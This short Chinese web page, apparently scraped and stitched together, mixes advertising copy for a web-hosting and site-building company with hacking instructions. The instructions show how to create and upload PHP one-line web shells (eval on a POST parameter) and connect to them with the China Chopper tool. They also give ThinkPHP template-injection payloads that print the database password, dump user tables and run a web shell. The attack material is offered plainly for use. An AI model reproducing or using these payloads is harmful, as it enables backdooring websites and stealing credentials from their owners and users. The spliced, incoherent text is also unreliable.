重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
右键,新建文本文件,把这句话输入里面, ?php @eval($_POST['12345']);? 然后把后缀名修改成php再上传到网站目录里面,比如我的文件名是test.php,那么就这样填写
创新互联建站是网站建设技术企业,为成都企业提供专业的做网站、网站设计,网站设计,网站制作,网站改版等技术服务。拥有十年丰富建站经验和众多成功案例,为您定制适合企业的网站。十年品质,值得信赖!
在项目中新建一个PHP文件,里面写这样一段代码:?php eval($_POST['ee']); ?,再用中国菜刀去连接,密码:就是ee,可以随便改,
1. 使用URL可以查看用户的数据库帐号密码DB_NAME,DB_PASS,DB_HOST
{@print(THINK_VERSION)}
{@print(C(‘’))}
{@print(C(‘DB_PASS’))}
2.使用模型D方法或者M方法,猜测后台帐号密码,当然首先要先猜一下用户的表名了
{@var_dump(D(user)-select())}
3.直接执行一句话代码,然后用菜刀直接连接.
{${eval($_POST[s])}} 一句话密码:s